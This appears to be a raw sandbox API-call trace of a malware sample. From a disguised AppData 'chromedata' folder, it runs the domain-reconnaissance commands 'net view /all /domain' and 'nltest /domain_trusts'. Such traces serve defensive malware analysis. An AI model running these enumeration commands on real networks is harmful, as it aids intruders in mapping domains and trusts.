	[0249.389] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming", lpFindFileData=0x2bf4b8 | out: lpFindFileData=0x2bf4b8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0x78fd700, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x78fd700, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x4b0060
	[0249.390] FindClose (in: hFindFile=0x4b0060 | out: hFindFile=0x4b0060) returned 1
	[0249.390] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFindFileData=0x2bf4b8 | out: lpFindFileData=0x2bf4b8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x78fd700, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x744be640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x744be640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="chromedata", cAlternateFileName="CHROME~1")) returned 0x4b0060
	[0249.390] FindClose (in: hFindFile=0x4b0060 | out: hFindFile=0x4b0060) returned 1
	[0249.390] _wcsnicmp (_String1="CHROME~1", _String2="chromedata", _MaxCount=0xa) returned 26
	[0249.390] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 0x2010
	[0249.390] SetCurrentDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 1
	[0249.390] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 1
	[0249.390] GetProcessHeap () returned 0x4a0000
	[0249.390] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b2820 | out: hHeap=0x4a0000) returned 1
	[0249.390] GetEnvironmentStringsW () returned 0x4b01d0*
	[0249.390] GetProcessHeap () returned 0x4a0000
	[0249.390] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x97c) returned 0x4b1f00
	[0249.390] FreeEnvironmentStringsW (penv=0x4b01d0) returned 1
	[0249.390] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e15260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0249.390] GetProcessHeap () returned 0x4a0000
	[0249.390] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a07f0 | out: hHeap=0x4a0000) returned 1
	[0249.390] GetProcessHeap () returned 0x4a0000
	[0249.390] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x400e) returned 0x4b3ac8
	[0249.391] GetProcessHeap () returned 0x4a0000
	[0249.391] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x38) returned 0x4b0060
	[0249.391] GetProcessHeap () returned 0x4a0000
	[0249.391] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ac8 | out: hHeap=0x4a0000) returned 1
	[0249.391] GetConsoleOutputCP () returned 0x1b5
	[0249.391] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e14260 | out: lpCPInfo=0x49e14260) returned 1
	[0249.391] GetUserDefaultLCID () returned 0x409
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e14950, cchData=8 | out: lpLCData=":") returned 2
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2bf87c, cchData=128 | out: lpLCData="0") returned 2
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2bf87c, cchData=128 | out: lpLCData="0") returned 2
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2bf87c, cchData=128 | out: lpLCData="1") returned 2
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e14940, cchData=8 | out: lpLCData="/") returned 2
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e14d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e14d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e14d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e14cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e14c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e14c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0249.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e14c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0249.392] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e14930, cchData=8 | out: lpLCData=".") returned 2
	[0249.392] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e14920, cchData=8 | out: lpLCData=",") returned 2
	[0249.392] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0249.393] GetProcessHeap () returned 0x4a0000
	[0249.393] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20c) returned 0x4b28c0
	[0249.393] GetConsoleTitleW (in: lpConsoleTitle=0x4b28c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0249.393] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0249.393] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0249.393] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0249.393] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0249.393] GetProcessHeap () returned 0x4a0000
	[0249.393] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x400a) returned 0x4b3ac8
	[0249.393] GetProcessHeap () returned 0x4a0000
	[0249.393] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ac8 | out: hHeap=0x4a0000) returned 1
	[0249.394] _wcsicmp (_String1="net", _String2=")") returned 69
	[0249.394] _wcsicmp (_String1="FOR", _String2="net") returned -8
	[0249.394] _wcsicmp (_String1="FOR/?", _String2="net") returned -8
	[0249.394] _wcsicmp (_String1="IF", _String2="net") returned -5
	[0249.394] _wcsicmp (_String1="IF/?", _String2="net") returned -5
	[0249.394] _wcsicmp (_String1="REM", _String2="net") returned 4
	[0249.394] _wcsicmp (_String1="REM/?", _String2="net") returned 4
	[0249.394] GetProcessHeap () returned 0x4a0000
	[0249.394] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x58) returned 0x4b2ad8
	[0249.394] GetProcessHeap () returned 0x4a0000
	[0249.394] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x10) returned 0x4ad558
	[0249.394] GetProcessHeap () returned 0x4a0000
	[0249.394] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2e) returned 0x4b2b38
	[0249.395] GetConsoleTitleW (in: lpConsoleTitle=0x2bf574, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0249.395] _wcsicmp (_String1="net", _String2="DIR") returned 10
	[0249.395] _wcsicmp (_String1="net", _String2="ERASE") returned 9
	[0249.395] _wcsicmp (_String1="net", _String2="DEL") returned 10
	[0249.395] _wcsicmp (_String1="net", _String2="TYPE") returned -6
	[0249.395] _wcsicmp (_String1="net", _String2="COPY") returned 11
	[0249.395] _wcsicmp (_String1="net", _String2="CD") returned 11
	[0249.395] _wcsicmp (_String1="net", _String2="CHDIR") returned 11
	[0249.395] _wcsicmp (_String1="net", _String2="RENAME") returned -4
	[0249.395] _wcsicmp (_String1="net", _String2="REN") returned -4
	[0249.395] _wcsicmp (_String1="net", _String2="ECHO") returned 9
	[0249.395] _wcsicmp (_String1="net", _String2="SET") returned -5
	[0249.395] _wcsicmp (_String1="net", _String2="PAUSE") returned -2
	[0249.395] _wcsicmp (_String1="net", _String2="DATE") returned 10
	[0249.395] _wcsicmp (_String1="net", _String2="TIME") returned -6
	[0249.395] _wcsicmp (_String1="net", _String2="PROMPT") returned -2
	[0249.395] _wcsicmp (_String1="net", _String2="MD") returned 1
	[0249.395] _wcsicmp (_String1="net", _String2="MKDIR") returned 1
	[0249.395] _wcsicmp (_String1="net", _String2="RD") returned -4
	[0249.395] _wcsicmp (_String1="net", _String2="RMDIR") returned -4
	[0249.395] _wcsicmp (_String1="net", _String2="PATH") returned -2
	[0249.395] _wcsicmp (_String1="net", _String2="GOTO") returned 7
	[0249.395] _wcsicmp (_String1="net", _String2="SHIFT") returned -5
	[0249.395] _wcsicmp (_String1="net", _String2="CLS") returned 11
	[0249.395] _wcsicmp (_String1="net", _String2="CALL") returned 11
	[0249.395] _wcsicmp (_String1="net", _String2="VERIFY") returned -8
	[0249.395] _wcsicmp (_String1="net", _String2="VER") returned -8
	[0249.395] _wcsicmp (_String1="net", _String2="VOL") returned -8
	[0249.395] _wcsicmp (_String1="net", _String2="EXIT") returned 9
	[0249.395] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5
	[0249.395] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9
	[0249.395] _wcsicmp (_String1="net", _String2="TITLE") returned -6
	[0249.395] _wcsicmp (_String1="net", _String2="START") returned -5
	[0249.396] _wcsicmp (_String1="net", _String2="DPATH") returned 10
	[0249.396] _wcsicmp (_String1="net", _String2="KEYS") returned 3
	[0249.396] _wcsicmp (_String1="net", _String2="MOVE") returned 1
	[0249.396] _wcsicmp (_String1="net", _String2="PUSHD") returned -2
	[0249.396] _wcsicmp (_String1="net", _String2="POPD") returned -2
	[0249.396] _wcsicmp (_String1="net", _String2="ASSOC") returned 13
	[0249.396] _wcsicmp (_String1="net", _String2="FTYPE") returned 8
	[0249.396] _wcsicmp (_String1="net", _String2="BREAK") returned 12
	[0249.396] _wcsicmp (_String1="net", _String2="COLOR") returned 11
	[0249.396] _wcsicmp (_String1="net", _String2="MKLINK") returned 1
	[0249.396] _wcsicmp (_String1="net", _String2="DIR") returned 10
	[0249.396] _wcsicmp (_String1="net", _String2="ERASE") returned 9
	[0249.396] _wcsicmp (_String1="net", _String2="DEL") returned 10
	[0249.396] _wcsicmp (_String1="net", _String2="TYPE") returned -6
	[0249.396] _wcsicmp (_String1="net", _String2="COPY") returned 11
	[0249.396] _wcsicmp (_String1="net", _String2="CD") returned 11
	[0249.396] _wcsicmp (_String1="net", _String2="CHDIR") returned 11
	[0249.396] _wcsicmp (_String1="net", _String2="RENAME") returned -4
	[0249.396] _wcsicmp (_String1="net", _String2="REN") returned -4
	[0249.396] _wcsicmp (_String1="net", _String2="ECHO") returned 9
	[0249.396] _wcsicmp (_String1="net", _String2="SET") returned -5
	[0249.396] _wcsicmp (_String1="net", _String2="PAUSE") returned -2
	[0249.396] _wcsicmp (_String1="net", _String2="DATE") returned 10
	[0249.396] _wcsicmp (_String1="net", _String2="TIME") returned -6
	[0249.396] _wcsicmp (_String1="net", _String2="PROMPT") returned -2
	[0249.396] _wcsicmp (_String1="net", _String2="MD") returned 1
	[0249.396] _wcsicmp (_String1="net", _String2="MKDIR") returned 1
	[0249.396] _wcsicmp (_String1="net", _String2="RD") returned -4
	[0249.396] _wcsicmp (_String1="net", _String2="RMDIR") returned -4
	[0249.396] _wcsicmp (_String1="net", _String2="PATH") returned -2
	[0249.396] _wcsicmp (_String1="net", _String2="GOTO") returned 7
	[0249.396] _wcsicmp (_String1="net", _String2="SHIFT") returned -5
	[0249.396] _wcsicmp (_String1="net", _String2="CLS") returned 11
	[0249.396] _wcsicmp (_String1="net", _String2="CALL") returned 11
	[0249.396] _wcsicmp (_String1="net", _String2="VERIFY") returned -8
	[0249.396] _wcsicmp (_String1="net", _String2="VER") returned -8
	[0249.396] _wcsicmp (_String1="net", _String2="VOL") returned -8
	[0249.396] _wcsicmp (_String1="net", _String2="EXIT") returned 9
	[0249.396] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5
	[0249.396] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9
	[0249.396] _wcsicmp (_String1="net", _String2="TITLE") returned -6
	[0249.396] _wcsicmp (_String1="net", _String2="START") returned -5
	[0249.396] _wcsicmp (_String1="net", _String2="DPATH") returned 10
	[0249.396] _wcsicmp (_String1="net", _String2="KEYS") returned 3
	[0249.396] _wcsicmp (_String1="net", _String2="MOVE") returned 1
	[0249.396] _wcsicmp (_String1="net", _String2="PUSHD") returned -2
	[0249.396] _wcsicmp (_String1="net", _String2="POPD") returned -2
	[0249.397] _wcsicmp (_String1="net", _String2="ASSOC") returned 13
	[0249.397] _wcsicmp (_String1="net", _String2="FTYPE") returned 8
	[0249.397] _wcsicmp (_String1="net", _String2="BREAK") returned 12
	[0249.397] _wcsicmp (_String1="net", _String2="COLOR") returned 11
	[0249.397] _wcsicmp (_String1="net", _String2="MKLINK") returned 1
	[0249.397] _wcsicmp (_String1="net", _String2="FOR") returned 8
	[0249.397] _wcsicmp (_String1="net", _String2="IF") returned 5
	[0249.397] _wcsicmp (_String1="net", _String2="REM") returned -4
	[0249.397] GetProcessHeap () returned 0x4a0000
	[0249.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x210) returned 0x4b2b70
	[0249.397] GetProcessHeap () returned 0x4a0000
	[0249.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x36) returned 0x4b2d88
	[0249.397] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11
	[0249.397] GetProcessHeap () returned 0x4a0000
	[0249.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x418) returned 0x4a07f0
	[0249.397] SetErrorMode (uMode=0x0) returned 0x8001
	[0249.397] SetErrorMode (uMode=0x1) returned 0x0
	[0249.397] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4a07f8, lpFilePart=0x2bf094 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x2bf094*="chromedata") returned 0x30
	[0249.397] SetErrorMode (uMode=0x8001) returned 0x1
	[0249.397] GetProcessHeap () returned 0x4a0000
	[0249.397] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4a07f0, Size=0x72) returned 0x4a07f0
	[0249.397] GetProcessHeap () returned 0x4a0000
	[0249.397] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4a07f0) returned 0x72
	[0249.397] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0249.397] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0249.397] GetProcessHeap () returned 0x4a0000
	[0249.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x17e) returned 0x4b2dc8
	[0249.397] GetProcessHeap () returned 0x4a0000
	[0249.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2f4) returned 0x4a0870
	[0249.403] GetProcessHeap () returned 0x4a0000
	[0249.403] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4a0870, Size=0x180) returned 0x4a0870
	[0249.403] GetProcessHeap () returned 0x4a0000
	[0249.403] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4a0870) returned 0x180
	[0249.403] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0249.403] GetProcessHeap () returned 0x4a0000
	[0249.403] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xe0) returned 0x4b2f50
	[0249.403] GetProcessHeap () returned 0x4a0000
	[0249.403] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b2f50, Size=0x76) returned 0x4b2f50
	[0249.403] GetProcessHeap () returned 0x4a0000
	[0249.403] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b2f50) returned 0x76
	[0249.404] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0249.404] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\net.*", fInfoLevelId=0x1, lpFindFileData=0x2bee10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee10) returned 0xffffffff
	[0249.404] GetLastError () returned 0x2
	[0249.404] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\net", fInfoLevelId=0x1, lpFindFileData=0x2bee10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee10) returned 0xffffffff
	[0249.404] GetLastError () returned 0x2
	[0249.404] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0249.404] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\net.*", fInfoLevelId=0x1, lpFindFileData=0x2bee10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee10) returned 0xffffffff
	[0249.405] GetLastError () returned 0x2
	[0249.405] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\net", fInfoLevelId=0x1, lpFindFileData=0x2bee10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee10) returned 0xffffffff
	[0249.405] GetLastError () returned 0x2
	[0249.405] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0249.405] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x2bee10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee10) returned 0x4b2fd0
	[0249.405] GetProcessHeap () returned 0x4a0000
	[0249.405] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4b3010
	[0249.405] FindClose (in: hFindFile=0x4b2fd0 | out: hFindFile=0x4b2fd0) returned 1
	[0249.405] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x2bee10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee10) returned 0xffffffff
	[0249.405] GetLastError () returned 0x2
	[0249.406] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x2bee10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee10) returned 0x4b2fd0
	[0249.406] GetProcessHeap () returned 0x4a0000
	[0249.406] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b3010, Size=0x4) returned 0x4b3010
	[0249.406] FindClose (in: hFindFile=0x4b2fd0 | out: hFindFile=0x4b2fd0) returned 1
	[0249.406] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0249.406] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0249.406] GetConsoleTitleW (in: lpConsoleTitle=0x2bf308, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0249.406] InitializeProcThreadAttributeList (in: lpAttributeList=0x2bf190, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2bf258 | out: lpAttributeList=0x2bf190, lpSize=0x2bf258) returned 1
	[0249.406] UpdateProcThreadAttribute (in: lpAttributeList=0x2bf190, dwFlags=0x0, Attribute=0x60001, lpValue=0x2bf250, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2bf190, lpPreviousValue=0x0) returned 1
	[0249.406] GetStartupInfoW (in: lpStartupInfo=0x2bf14c | out: lpStartupInfo=0x2bf14c*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x14c, hStdError=0x14c)) 
	[0249.406] GetProcessHeap () returned 0x4a0000
	[0249.406] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x18) returned 0x4b2fd0
	[0249.406] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0249.406] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0249.406] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0249.406] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0249.406] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0249.406] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0249.406] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0249.406] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0249.407] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0249.407] GetProcessHeap () returned 0x4a0000
	[0249.407] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b2fd0 | out: hHeap=0x4a0000) returned 1
	[0249.407] GetProcessHeap () returned 0x4a0000
	[0249.407] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xa) returned 0x4ad570
	[0249.407] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1
	[0249.408] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net  view /all /domain", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpStartupInfo=0x2bf1ec*(cb=0x48, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="net  view /all /domain", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2bf238 | out: lpCommandLine="net  view /all /domain", lpProcessInformation=0x2bf238*(hProcess=0x50, hThread=0x4c, dwProcessId=0xed4, dwThreadId=0xed8)) returned 1
	[0249.411] CloseHandle (hObject=0x4c) returned 1
	[0249.411] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0249.411] GetProcessHeap () returned 0x4a0000
	[0249.411] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b1f00 | out: hHeap=0x4a0000) returned 1
	[0249.411] GetEnvironmentStringsW () returned 0x4b1f00*
	[0249.411] GetProcessHeap () returned 0x4a0000
	[0249.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x97c) returned 0x4b01d0
	[0249.411] FreeEnvironmentStringsW (penv=0x4b1f00) returned 1
	[0249.411] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) 

Process:
	id = "55"
	image_name = "net.exe"
	filename = "c:\\windows\\system32\\net.exe"
	page_root = "0x7ee177e0"
	os_pid = "0xed4"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "54"
	os_parent_pid = "0xd70"
	cmd_line = "net  view /all /domain"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 366
	os_tid = 0xed8


Thread:
	id = 367
	os_tid = 0xecc


Process:
	id = "56"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17800"
	os_pid = "0xed0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "40"
	os_parent_pid = "0xa70"
	cmd_line = "/c nltest /domain_trusts"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
